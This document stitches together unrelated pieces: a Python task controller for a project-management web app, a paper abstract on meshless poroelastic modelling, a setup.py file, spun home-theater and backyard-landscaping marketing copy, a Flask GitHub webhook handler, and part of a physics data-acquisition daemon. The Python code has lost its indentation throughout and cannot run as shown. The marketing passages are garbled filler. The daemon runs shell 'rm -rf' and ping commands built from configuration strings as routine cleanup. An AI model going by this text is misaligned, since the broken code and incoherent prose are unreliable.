pass
# Milestones
if settings.get_project_milestones():
table = s3db.project_task_milestone
field = table.milestone_id
if project and r.id:
query = (table.task_id == r.id)
default = db(query).select(field,
limitby=(0, 1)).first()
if default:
default = default.milestone_id
else:
default = field.default
field_id = "%s_%s" % (table._tablename, field.name)
# Options will be added later based on the Project
if default:
field.requires = IS_IN_SET({default:field.represent(default)})
else:
field.requires = IS_IN_SET([])
#widget = SELECT(_id=field_id, _name=field.name)
widget = SQLFORM.widgets.options.widget(field, default)
label = field.label
label = LABEL(label, label and sep, _for=field_id,
_id=field_id + SQLFORM.ID_LABEL_SUFFIX)
comment = S3AddResourceLink(T("Add Milestone"),
c="project",
f="milestone",
tooltip=T("If you don't see the milestone in the list, you can add a new one by clicking link 'Add Milestone'."))
options = {"triggerName": "project_id",
"targetName": "milestone_id",
"lookupPrefix": "project",
"lookupResource": "milestone",
"optional": True,
}
s3.jquery_ready.append('''S3OptionsFilter(%s)''' % json.dumps(options))
row_id = field_id + SQLFORM.ID_ROW_SUFFIX
row = s3_formstyle(row_id, label, widget, comment)
try:
output["form"][0].insert(14, row[1])
output["form"][0].insert(14, row[0])
except:
# A non-standard formstyle with just a single row
pass
try:
output["form"][0].insert(7, row[0])
except:
pass
if project:
vars = current.request.get_vars
if "project" in vars:
widget = INPUT(value=vars.project, _name="project_id")
row = s3_formstyle("project_task_project__row", "",
widget, "", hidden=True)
else:
table = s3db.project_task_project
field = table.project_id
if r.id:
query = (table.task_id == r.id)
default = db(query).select(table.project_id,
limitby=(0, 1)).first()
if default:
default = default.project_id
else:
default = field.default
widget = field.widget or SQLFORM.widgets.options.widget(field, default)
field_id = "%s_%s" % (table._tablename, field.name)
label = field.label
label = LABEL(label, label and sep, _for=field_id,
_id=field_id + SQLFORM.ID_LABEL_SUFFIX)
comment = field.comment if auth.s3_has_role("STAFF") else ""
row_id = field_id + SQLFORM.ID_ROW_SUFFIX
row = s3_formstyle(row_id, label, widget, comment)
try:
output["form"][0].insert(0, row[1])
except:
# A non-standard formstyle with just a single row
pass
try:
output["form"][0].insert(0, row[0])
except:
pass
return output
# =============================================================================
def project_task_controller():
"""
Tasks Controller, defined in the model for use from
multiple controllers for unified menus
"""
T = current.T
s3db = current.s3db
auth = current.auth
s3 = current.response.s3
vars = current.request.get_vars
# Pre-process
def prep(r):
tablename = "project_task"
table = s3db.project_task
statuses = s3.project_task_active_statuses
crud_strings = s3.crud_strings[tablename]
if r.record:
if r.interactive:
# Put the Comments in the RFooter
project_ckeditor()
s3.rfooter = LOAD("project", "comments.load",
args=[r.id],
ajax=True)
elif "mine" in vars:
# Show the Open Tasks for this User
if auth.user:
pe_id = auth.user.pe_id
s3.filter = (table.pe_id == pe_id) & \
(table.status.belongs(statuses))
crud_strings.title_list = T("My Open Tasks")
crud_strings.msg_list_empty = T("No Tasks Assigned")
s3db.configure(tablename,
copyable=False,
listadd=False)
try:
# Add Project
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(4, (T("Project"), "task_project.project_id"))
# Hide the Assignee column (always us)
list_fields.remove("pe_id")
# Hide the Status column (always 'assigned' or 'reopened')
list_fields.remove("status")
s3db.configure(tablename,
list_fields=list_fields)
except:
pass
elif "project" in vars:
# Show Open Tasks for this Project
project = vars.project
ptable = s3db.project_project
try:
name = current.db(ptable.id == project).select(ptable.name,
limitby=(0, 1)).first().name
except:
current.session.error = T("Project not Found")
redirect(URL(args=None, vars=None))
if r.method == "search":
# @ToDo: get working
r.get_vars = {"task_search_project": name,
"task_search_status": ",".join([str(status) for status in statuses])
}
else:
ltable = s3db.project_task_project
s3.filter = (ltable.project_id == project) & \
(ltable.task_id == table.id) & \
(table.status.belongs(statuses))
crud_strings.title_list = T("Open Tasks for %(project)s") % dict(project=name)
crud_strings.title_search = T("Search Open Tasks for %(project)s") % dict(project=name)
crud_strings.msg_list_empty = T("No Open Tasks for %(project)s") % dict(project=name)
# Add Activity
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(2, (T("Activity"), "task_activity.activity_id"))
s3db.configure(tablename,
# Block Add until we get the injectable component lookups
insertable=False,
deletable=False,
copyable=False,
list_fields=list_fields)
elif "open" in vars:
# Show Only Open Tasks
crud_strings.title_list = T("All Open Tasks")
s3.filter = (table.status.belongs(statuses))
else:
crud_strings.title_list = T("All Tasks")
crud_strings.title_search = T("All Tasks")
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(3, (T("Project"), "task_project.project_id"))
list_fields.insert(4, (T("Activity"), "task_activity.activity_id"))
if r.component:
if r.component_name == "req":
if current.deployment_settings.has_module("hrm"):
r.component.table.type.default = 3
if r.method != "update" and r.method != "read":
# Hide fields which don't make sense in a Create form
s3db.req_create_form_mods()
elif r.component_name == "human_resource":
r.component.table.type.default = 2
else:
if not auth.s3_has_role("STAFF"):
# Hide fields to avoid confusion (both of inputters & recipients)
table = r.table
field = table.time_actual
field.readable = field.writable = False
return True
s3.prep = prep
# Post-process
def postp(r, output):
if r.interactive:
if not r.component and \
r.method != "import":
update_url = URL(args=["[id]"], vars=vars)
current.manager.crud.action_buttons(r,
update_url=update_url)
if not r.method in ("search", "report") and \
"form" in output:
# Insert fields to control the Project, Activity & Milestone
output = project_task_form_inject(r, output)
return output
s3.postp = postp
if "mine" in vars or \
"project" in vars:
hide_filter = True
else:
hide_filter = False
return current.rest_controller("project", "task",
rheader=s3db.project_rheader,
hide_filter=hide_filter,
)
# END =========================================================================
|
Keywords Meshless Local Petrov-Galerkin; Moving Least Squares; Analytical Integration; Shape Function Derivatives; Poroelastodynamics; Independent Phase Discretization.
Abstract This work proposes a modified procedure, based on analytical integrations, to analyse poroelastic models discretized by time-domain Meshless Local Petrov-Galerkin formulations. In this context, Taylor series expansions of the incognita fields are considered, and the related integrals of the meshless formulations are solved analytically, rendering a so called modified methodology. The work is based on the u-p formulation and the incognita fields of the coupled analysis in focus are the solid skeleton displacements and the interstitial fluid pore pressures. Independent spatial discretization is considered for each phase of the model, rendering a more flexible and efficient methodology. The Moving Least Squares approximation is employed for the spatial variation of the displacement and pore-pressure fields and two variants of the meshless local Petrov-Galerkin formulation are discussed here, which are based on the use of Heaviside or Gaussian weight test functions. Modified expressions to properly compute the shape function derivatives are also considered. At the end of the paper, numerical examples illustrate the performance and potentialities of the proposed techniques.
|
# Copyright (c) 2014, Stavros Sachtouris
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from setuptools import setup
import triaina
setup(
name='triaina',
version=triaina.__version__,
description=('A kamaki clone done differently'),
long_description=open('README.md').read(),
url='http://github.com/saxtouri/triaina',
download_url='https://github.com/saxtouri/triaina/archive/master.zip',
license='BSD',
author='Stavros Sachtouris',
author_email='saxtouri@gmail.com',
maintainer='Stavros Sachtouris',
maintainer_email='saxtouri@gmail.com',
packages=['triaina', ],
classifiers=[
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Environment :: Console',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Topic :: System :: Shells',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities'
],
include_package_data=True,
entry_points={
},
install_requires=[]
)
|
Here at Home Theater Installation Pro, we'll be ready to satisfy your needs regarding Home Theater Installation in Melbourne, IA. You'll need the most innovative modern technology in the field, and our crew of highly skilled professionals will offer just that. We grantee that you get the best services, the best value, and the highest quality materials. We will help you to come up with decisions for the task, respond to all your questions, and organize an appointment with our workers whenever you call us at 844-244-6355.
You will have a budget to stick to, and you need to cut costs. Still you require superior services on Home Theater Installation in Melbourne, IA, so you can rely on us to help you save money while continuing with offering the highest quality services. We offer the highest quality even while still saving you money. If you work with us, you'll receive the advantage of our own practical knowledge and superior materials to be sure that your project can last even while saving time and cash. For example, we are alert to keep clear of costly mistakes, do the job promptly to help save hours, and guarantee that you receive the top discounts on supplies and work. If you need to get lower rates, Home Theater Installation Pro is the company to contact. Dial 844-244-6355 to talk to our client care staff, right now.
You will need to be informed when it comes to Home Theater Installation in Melbourne, IA. We won't encourage you to come up with ill advised judgments, as we know exactly what we'll be working at, and we make sure you know very well what to expect from the project. That's why we make every effort to be sure that you understand the procedure and aren't confronted by any surprises. Begin by calling 844-244-6355 to talk about your job. We'll resolve all of your questions and schedule the initial meeting. We are going to work together with you throughout the whole project, and our company will appear on time and ready.
Lots of reasons exist to decide on Home Theater Installation Pro for Home Theater Installation in Melbourne, IA. Our supplies are of the highest quality, our cash saving solutions are practical and powerful, and our customer support ratings won't be beat. Our company has the experience that you need to fulfill your goals and objectives. When you need Home Theater Installation in Melbourne, call Home Theater Installation Pro by dialing 844-244-6355, and we will be pleased to help you.
|
# Copyright 2019 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import hmac
import json
import os
import sys
import time
import urllib
from flask import Flask, request
from google.cloud import secretmanager_v1beta1
from hashlib import sha1
app = Flask(__name__)
@app.route("/", methods=["POST"])
def index():
signature = request.headers.get("X-Hub-Signature", None)
body = request.data
# Only process data with a valid signature
assert verify_signature(signature, body), "Unverified Signature"
# Load the event as JSON for easier handling
event = request.get_json(force=True)
# Insert row into bigquery
insert_row_into_bigquery(event)
# Post new issues to Slack
if event["action"] == "opened":
issue_title = event["issue"]["title"]
issue_url = event["issue"]["html_url"]
send_issue_notification_to_slack(issue_title, issue_url)
# Post response to Github
create_issue_comment(event["issue"]["url"])
print("Yay")
sys.stdout.flush()
return ("", 204)
def verify_signature(signature, body):
expected_signature = "sha1="
try:
# Get secret from Cloud Secret Manager
secret = get_secret(
os.environ.get("PROJECT_NAME"), os.environ.get("SECRET_NAME"), "1"
)
# Compute the hashed signature
hashed = hmac.new(secret, body, sha1)
expected_signature += hashed.hexdigest()
except Exception as e:
print(e)
return hmac.compare_digest(signature, expected_signature)
def send_issue_notification_to_slack(issue_title, issue_url):
# Sends a message to Slack Channel
msg = {
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": f"New issue created: <{issue_url}|{issue_title}>",
},
}
]
}
req = urllib.request.Request(
os.environ.get("SLACK_URL"),
data=json.dumps(msg).encode("utf8"),
headers={"Content-Type": "application/json"},
)
response = urllib.request.urlopen(req)
def insert_row_into_bigquery(event):
from google.cloud import bigquery
# Set up bigquery instance
client = bigquery.Client()
dataset_id = os.environ.get("DATASET")
table_id = os.environ.get("TABLE")
table_ref = client.dataset(dataset_id).table(table_id)
table = client.get_table(table_ref)
# Insert row
row_to_insert = [
(
event["issue"]["title"],
event["action"],
event["issue"]["html_url"],
time.time(),
)
]
bq_errors = client.insert_rows(table, row_to_insert)
# If errors, log to Stackdriver
if bq_errors:
entry = {
"severity": "WARNING",
"msg": "Row not inserted.",
"errors": bq_errors,
"row": row_to_insert,
}
print(json.dumps(entry))
def create_issue_comment(api_url):
# Posts an auto response to Github Issue
# Get tokens
pem = get_secret(os.environ.get("PROJECT_NAME"), os.environ.get("PEM"), "1")
app_token = get_jwt(pem)
installation_token = get_installation_token(app_token)
# Create Github issue comment via HTTP POST
try:
msg = {
"body": "Thank you for filing an issue. \
Someone will respond within 24 hours."
}
req = urllib.request.Request(
api_url + "/comments", data=json.dumps(msg).encode("utf8")
)
req.add_header("Authorization", f"Bearer {installation_token}")
response = urllib.request.urlopen(req)
except Exception as e:
print(e)
def get_jwt(pem):
# Encodes and returns JWT
from jwt import JWT, jwk_from_pem
payload = {
"iat": int(time.time()),
"exp": int(time.time()) + (10 * 60),
"iss": os.environ.get("APP_ID"),
}
jwt = JWT()
return jwt.encode(payload, jwk_from_pem(pem), "RS256")
def get_installation_token(jwt):
# Get App installation token to use Github API
req = urllib.request.Request(os.environ.get("INSTALLATION"), method="POST")
req.add_header("Authorization", f"Bearer {jwt}")
req.add_header("Accept", "application/vnd.github.machine-man-preview+json")
response = urllib.request.urlopen(req)
token_json = json.loads(response.read())
return token_json["token"]
def get_secret(project_name, secret_name, version_num):
# Returns secret payload from Cloud Secret Manager
client = secretmanager_v1beta1.SecretManagerServiceClient()
name = client.secret_version_path(project_name, secret_name, version_num)
secret = client.access_secret_version(name)
return secret.payload.data
if __name__ == "__main__":
PORT = int(os.getenv("PORT")) if os.getenv("PORT") else 8080
# This is used when running locally. Gunicorn is used to run the
# application on Cloud Run. See entrypoint in Dockerfile.
app.run(host="127.0.0.1", port=PORT, debug=True)
|
Unique Small Backyard Landscaping Ideas Australia – Most homeowners understand that buying a property often comes along with certain quantity of compromise. For some, this usually means making peace with a yard that is cozy instead of sprawling grounds. We have compiled some yard layout ideas to help turn this compromise.
Your stamp stamp lawn can be converted that you and your family can enjoy for years to come. In addition, if you are planning on selling your home in the future though it could be further down the street, the ideal design could turn a selling feature into an appreciating asset.
In terms of how to go about re-imaging the distance, while style will undoubtedly play a pivotal part ensure success. Our backyard thoughts that are small will have you relaxing in a space that’s aesthetically gratifying and equally functional that you will not even be thinking about the footage.
|
#!/bin/env python
import os,sys
sys.path.append('/opt/hltd/python')
sys.path.append('/opt/hltd/lib')
import time
import datetime
import dateutil.parser
import logging
import subprocess
from signal import SIGKILL
from signal import SIGINT
import simplejson as json
#import SOAPpy
import threading
import CGIHTTPServer
import BaseHTTPServer
import cgitb
import httplib
import demote
import re
import shutil
import socket
#import fcntl
#import random
#modules distributed with hltd
import prctl
#modules which are part of hltd
from daemon2 import Daemon2
from hltdconf import *
from inotifywrapper import InotifyWrapper
import _inotify as inotify
from elasticbu import BoxInfoUpdater
from aUtils import fileHandler,ES_DIR_NAME
from setupES import setupES
thishost = os.uname()[1]
nthreads = None
nstreams = None
expected_processes = None
runList = None
bu_disk_list_ramdisk=[]
bu_disk_list_output=[]
bu_disk_list_ramdisk_instance=[]
bu_disk_list_output_instance=[]
bu_disk_ramdisk_CI = None
bu_disk_ramdisk_CI_instance = None
resource_lock = threading.Lock()
nsslock = threading.Lock()
suspended=False
entering_cloud_mode=False
exiting_cloud_mode=False
cloud_mode=False
abort_cloud_mode=False
cached_pending_run = None
resources_blocked_flag=False
disabled_resource_allocation=False
masked_resources=False
fu_watchdir_is_mountpoint=False
ramdisk_submount_size=0
machine_blacklist=[]
boxinfoFUMap = {}
boxdoc_version = 1
logCollector = None
q_list = []
num_excluded=0
dqm_globalrun_filepattern = '.run{0}.global'
def setFromConf(myinstance):
global conf
global logger
global idles
global used
global broken
global quarantined
global cloud
conf=initConf(myinstance)
idles = conf.resource_base+'/idle/'
used = conf.resource_base+'/online/'
broken = conf.resource_base+'/except/'
quarantined = conf.resource_base+'/quarantined/'
cloud = conf.resource_base+'/cloud/'
#prepare log directory
if myinstance!='main':
if not os.path.exists(conf.log_dir): os.makedirs(conf.log_dir)
if not os.path.exists(os.path.join(conf.log_dir,'pid')): os.makedirs(os.path.join(conf.log_dir,'pid'))
os.chmod(conf.log_dir,0777)
os.chmod(os.path.join(conf.log_dir,'pid'),0777)
logging.basicConfig(filename=os.path.join(conf.log_dir,"hltd.log"),
level=conf.service_log_level,
format='%(levelname)s:%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(os.path.basename(__file__))
conf.dump()
def preexec_function():
dem = demote.demote(conf.user)
dem()
prctl.set_pdeathsig(SIGKILL)
# os.setpgrp()
def cleanup_resources():
try:
dirlist = os.listdir(cloud)
for cpu in dirlist:
os.rename(cloud+cpu,idles+cpu)
dirlist = os.listdir(broken)
for cpu in dirlist:
os.rename(broken+cpu,idles+cpu)
dirlist = os.listdir(used)
for cpu in dirlist:
os.rename(used+cpu,idles+cpu)
dirlist = os.listdir(quarantined)
for cpu in dirlist:
os.rename(quarantined+cpu,idles+cpu)
dirlist = os.listdir(idles)
#quarantine files beyond use fraction limit (rounded to closest integer)
global num_excluded
num_excluded = int(round(len(dirlist)*(1.-conf.resource_use_fraction)))
for i in range(0,int(num_excluded)):
os.rename(idles+dirlist[i],quarantined+dirlist[i])
return True
except Exception as ex:
logger.warning(str(ex))
return False
def move_resources_to_cloud():
global q_list
dirlist = os.listdir(broken)
for cpu in dirlist:
os.rename(broken+cpu,cloud+cpu)
dirlist = os.listdir(used)
for cpu in dirlist:
os.rename(used+cpu,cloud+cpu)
dirlist = os.listdir(quarantined)
for cpu in dirlist:
os.rename(quarantined+cpu,cloud+cpu)
q_list=[]
dirlist = os.listdir(idles)
for cpu in dirlist:
os.rename(idles+cpu,cloud+cpu)
dirlist = os.listdir(idles)
for cpu in dirlist:
os.rename(idles+cpu,cloud+cpu)
def has_active_resources():
return len(os.listdir(broken))+len(os.listdir(used))+len(os.listdir(idles)) > 0
#interfaces to the cloud igniter script
def ignite_cloud():
try:
proc = subprocess.Popen([conf.cloud_igniter_path,'start'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = proc.communicate()[0]
if proc.returncode==0:
return True
else:
logger.error("cloud igniter start returned code "+str(proc.returncode))
if proc.returncode>1:
logger.error(out)
except OSError as ex:
if ex.errno==2:
logger.warning(conf.cloud_igniter_path + ' is missing')
else:
logger.error("Failed to run cloud igniter start")
logger.exception(ex)
return False
def extinguish_cloud():
try:
proc = subprocess.Popen([conf.cloud_igniter_path,'stop'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = proc.communicate()[0]
if proc.returncode in [0,1]:
return True
else:
logger.error("cloud igniter stop returned "+str(proc.returncode))
if len(out):logger.error(out)
except OSError as ex:
if ex.errno==2:
logger.warning(conf.cloud_igniter_path + ' is missing')
else:
logger.error("Failed to run cloud igniter start")
logger.exception(ex)
return False
def is_cloud_inactive():
try:
proc = subprocess.Popen([conf.cloud_igniter_path,'status'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = proc.communicate()[0]
if proc.returncode >1:
logger.error("cloud igniter status returned error code "+str(proc.returncode))
logger.error(out)
except OSError as ex:
if ex.errno==2:
logger.warning(conf.cloud_igniter_path + ' is missing')
else:
logger.error("Failed to run cloud igniter start")
logger.exception(ex)
return 100
return proc.returncode
def umount_helper(point,attemptsLeft=3,initial=True):
if initial:
try:
logger.info('calling umount of '+point)
subprocess.check_call(['umount',point])
except subprocess.CalledProcessError, err1:
if err1.returncode<2:return True
if attemptsLeft<=0:
logger.error('Failed to perform umount of '+point+'. returncode:'+str(err1.returncode))
return False
logger.warning("umount failed, trying to kill users of mountpoint "+point)
try:
nsslock.acquire()
f_user = subprocess.Popen(['fuser','-km',os.path.join('/'+point,conf.ramdisk_subdirectory)],shell=False,preexec_fn=preexec_function,close_fds=True)
nsslock.release()
f_user.wait()
except:
try:nsslock.release()
except:pass
return umount_helper(point,attemptsLeft-1,initial=False)
else:
attemptsLeft-=1
time.sleep(.5)
try:
logger.info("trying umount -f of "+point)
subprocess.check_call(['umount','-f',point])
except subprocess.CalledProcessError, err2:
if err2.returncode<2:return True
if attemptsLeft<=0:
logger.error('Failed to perform umount -f of '+point+'. returncode:'+str(err2.returncode))
return False
return umount_helper(point,attemptsLeft,initial=False)
return True
def cleanup_mountpoints(remount=True):
global bu_disk_list_ramdisk
global bu_disk_list_ramdisk_instance
global bu_disk_list_output
global bu_disk_list_output_instance
global bu_disk_ramdisk_CI
global bu_disk_ramdisk_CI_instance
bu_disk_list_ramdisk = []
bu_disk_list_output = []
bu_disk_list_ramdisk_instance = []
bu_disk_list_output_instance = []
bu_disk_ramdisk_CI=None
bu_disk_ramdisk_CI_instance=None
if conf.bu_base_dir[0] == '/':
bu_disk_list_ramdisk = [os.path.join(conf.bu_base_dir,conf.ramdisk_subdirectory)]
bu_disk_list_output = [os.path.join(conf.bu_base_dir,conf.output_subdirectory)]
if conf.instance=="main":
bu_disk_list_ramdisk_instance = bu_disk_list_ramdisk
bu_disk_list_output_instance = bu_disk_list_output
else:
bu_disk_list_ramdisk_instance = [os.path.join(bu_disk_list_ramdisk[0],conf.instance)]
bu_disk_list_output_instance = [os.path.join(bu_disk_list_output[0],conf.instance)]
#make subdirectories if necessary and return
if remount==True:
try:
os.makedirs(os.path.join(conf.bu_base_dir,conf.ramdisk_subdirectory))
except OSError:
pass
try:
os.makedirs(os.path.join(conf.bu_base_dir,conf.output_subdirectory))
except OSError:
pass
return True
try:
process = subprocess.Popen(['mount'],stdout=subprocess.PIPE)
out = process.communicate()[0]
mounts = re.findall('/'+conf.bu_base_dir+'[0-9]+',out) + re.findall('/'+conf.bu_base_dir+'-CI/',out)
mounts = sorted(list(set(mounts)))
logger.info("cleanup_mountpoints: found following mount points: ")
logger.info(mounts)
umount_failure=False
for mpoint in mounts:
point = mpoint.rstrip('/')
umount_failure = umount_helper(os.path.join('/'+point,conf.ramdisk_subdirectory))==False
#only attempt this if first umount was successful
if umount_failure==False and not point.rstrip('/').endswith("-CI"):
umount_failure = umount_helper(os.path.join('/'+point,conf.output_subdirectory))==False
#this will remove directories only if they are empty (as unmounted mount point should be)
try:
if os.path.join('/'+point,conf.ramdisk_subdirectory)!='/':
os.rmdir(os.path.join('/'+point,conf.ramdisk_subdirectory))
except Exception as ex:
logger.exception(ex)
try:
if os.path.join('/'+point,conf.output_subdirectory)!='/':
if not point.rstrip('/').endswith("-CI"):
os.rmdir(os.path.join('/'+point,conf.output_subdirectory))
except Exception as ex:
logger.exception(ex)
if remount==False:
if umount_failure:return False
return True
i = 0
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if os.path.exists(bus_config):
lines = []
with open(bus_config) as fp:
lines = fp.readlines()
if conf.mount_control_path and len(lines):
try:
os.makedirs(os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory))
except OSError:
pass
try:
mountaddr = lines[0].split('.')[0]+'.cms'
#VM fallback
if lines[0].endswith('.cern.ch'): mountaddr = lines[0]
logger.info("found BU to mount (CI) at " + mountaddr)
except Exception as ex:
logger.fatal('Unable to parse bus.config file')
logger.exception(ex)
sys.exit(1)
attemptsLeft = 8
while attemptsLeft>0:
#by default ping waits 10 seconds
p_begin = datetime.datetime.now()
if os.system("ping -c 1 "+mountaddr)==0:
break
else:
p_end = datetime.datetime.now()
logger.warning('unable to ping '+mountaddr)
dt = p_end - p_begin
if dt.seconds < 10:
time.sleep(10-dt.seconds)
attemptsLeft-=1
if attemptsLeft==0:
logger.fatal('hltd was unable to ping BU '+mountaddr)
#check if bus.config has been updated
if (os.path.getmtime(bus_config) - busconfig_age)>1:
return cleanup_mountpoints(remount)
attemptsLeft=8
#sys.exit(1)
if True:
logger.info("trying to mount (CI) "+mountaddr+':/fff/'+conf.ramdisk_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory))
try:
subprocess.check_call(
[conf.mount_command,
'-t',
conf.mount_type,
'-o',
conf.mount_options_ramdisk,
mountaddr+':/fff/'+conf.ramdisk_subdirectory,
os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory)]
)
toappend = os.path.join('/'+conf.bu_base_dir+'-CI',conf.ramdisk_subdirectory)
bu_disk_ramdisk_CI=toappend
if conf.instance=="main":
bu_disk_ramdisk_CI_instance = toappend
else:
bu_disk_ramdisk_CI_instance = os.path.join(toappend,conf.instance)
except subprocess.CalledProcessError, err2:
logger.exception(err2)
logger.fatal("Unable to mount ramdisk - exiting.")
sys.exit(1)
busconfig_age = os.path.getmtime(bus_config)
for line in lines:
logger.info("found BU to mount at "+line.strip())
try:
os.makedirs(os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory))
except OSError:
pass
try:
os.makedirs(os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory))
except OSError:
pass
attemptsLeft = 8
while attemptsLeft>0:
#by default ping waits 10 seconds
p_begin = datetime.datetime.now()
if os.system("ping -c 1 "+line.strip())==0:
break
else:
p_end = datetime.datetime.now()
logger.warning('unable to ping '+line.strip())
dt = p_end - p_begin
if dt.seconds < 10:
time.sleep(10-dt.seconds)
attemptsLeft-=1
if attemptsLeft==0:
logger.fatal('hltd was unable to ping BU '+line.strip())
#check if bus.config has been updated
if (os.path.getmtime(bus_config) - busconfig_age)>1:
return cleanup_mountpoints(remount)
attemptsLeft=8
#sys.exit(1)
if True:
logger.info("trying to mount "+line.strip()+':/fff/'+conf.ramdisk_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory))
try:
subprocess.check_call(
[conf.mount_command,
'-t',
conf.mount_type,
'-o',
conf.mount_options_ramdisk,
line.strip()+':/fff/'+conf.ramdisk_subdirectory,
os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory)]
)
toappend = os.path.join('/'+conf.bu_base_dir+str(i),conf.ramdisk_subdirectory)
bu_disk_list_ramdisk.append(toappend)
if conf.instance=="main":
bu_disk_list_ramdisk_instance.append(toappend)
else:
bu_disk_list_ramdisk_instance.append(os.path.join(toappend,conf.instance))
except subprocess.CalledProcessError, err2:
logger.exception(err2)
logger.fatal("Unable to mount ramdisk - exiting.")
sys.exit(1)
logger.info("trying to mount "+line.strip()+':/fff/'+conf.output_subdirectory+' '+os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory))
try:
subprocess.check_call(
[conf.mount_command,
'-t',
conf.mount_type,
'-o',
conf.mount_options_output,
line.strip()+':/fff/'+conf.output_subdirectory,
os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory)]
)
toappend = os.path.join('/'+conf.bu_base_dir+str(i),conf.output_subdirectory)
bu_disk_list_output.append(toappend)
if conf.instance=="main" or conf.instance_same_destination==True:
bu_disk_list_output_instance.append(toappend)
else:
bu_disk_list_output_instance.append(os.path.join(toappend,conf.instance))
except subprocess.CalledProcessError, err2:
logger.exception(err2)
logger.fatal("Unable to mount output - exiting.")
sys.exit(1)
i+=1
#clean up suspended state
try:
if remount==True:os.popen('rm -rf '+conf.watch_directory+'/suspend*')
except:pass
except Exception as ex:
logger.error("Exception in cleanup_mountpoints")
logger.exception(ex)
if remount==True:
logger.fatal("Unable to handle (un)mounting")
return False
else:return False
def submount_size(basedir):
loop_size=0
try:
p = subprocess.Popen("mount", shell=False, stdout=subprocess.PIPE)
p.wait()
std_out=p.stdout.read().split("\n")
for l in std_out:
try:
ls = l.strip()
toks = l.split()
if toks[0].startswith(basedir) and toks[2].startswith(basedir) and 'loop' in toks[5]:
imgstat = os.stat(toks[0])
imgsize = imgstat.st_size
loop_size+=imgsize
except:pass
except:pass
return loop_size
def cleanup_bu_disks(run=None,cleanRamdisk=True,cleanOutput=True):
if cleanRamdisk:
if conf.watch_directory.startswith('/fff') and conf.ramdisk_subdirectory in conf.watch_directory:
logger.info('cleanup BU disks: deleting runs in ramdisk ...')
tries = 10
while tries > 0:
tries-=1
if run==None:
p = subprocess.Popen("rm -rf " + conf.watch_directory+'/run*',shell=True)
else:
p = subprocess.Popen("rm -rf " + conf.watch_directory+'/run'+str(run),shell=True)
p.wait()
if p.returncode==0:
logger.info('Ramdisk cleanup performed')
break
else:
logger.info('Failed ramdisk cleanup (return code:'+str(p.returncode)+') in attempt'+str(10-tries))
if cleanOutput:
outdirPath = conf.watch_directory[:conf.watch_directory.find(conf.ramdisk_subdirectory)]+conf.output_subdirectory
logger.info('outdirPath:'+ outdirPath + ' '+conf.output_subdirectory)
if outdirPath.startswith('/fff') and conf.output_subdirectory in outdirPath:
logger.info('cleanup BU disks: deleting runs in output disk ...')
tries = 10
while tries > 0:
tries-=1
if run==None:
p = subprocess.Popen("rm -rf " + outdirPath+'/run*',shell=True)
else:
p = subprocess.Popen("rm -rf " + outdirPath+'/run'+str(run),shell=True)
p.wait()
if p.returncode==0:
logger.info('Output cleanup performed')
break
else:
logger.info('Failed output disk cleanup (return code:'+str(p.returncode)+') in attempt '+str(10-tries))
def calculate_threadnumber():
global nthreads
global nstreams
global expected_processes
idlecount = len(os.listdir(idles))
if conf.cmssw_threads_autosplit>0:
nthreads = idlecount/conf.cmssw_threads_autosplit
nstreams = idlecount/conf.cmssw_threads_autosplit
if nthreads*conf.cmssw_threads_autosplit != nthreads:
logger.error("idle cores can not be evenly split to cmssw threads")
else:
nthreads = conf.cmssw_threads
nstreams = conf.cmssw_streams
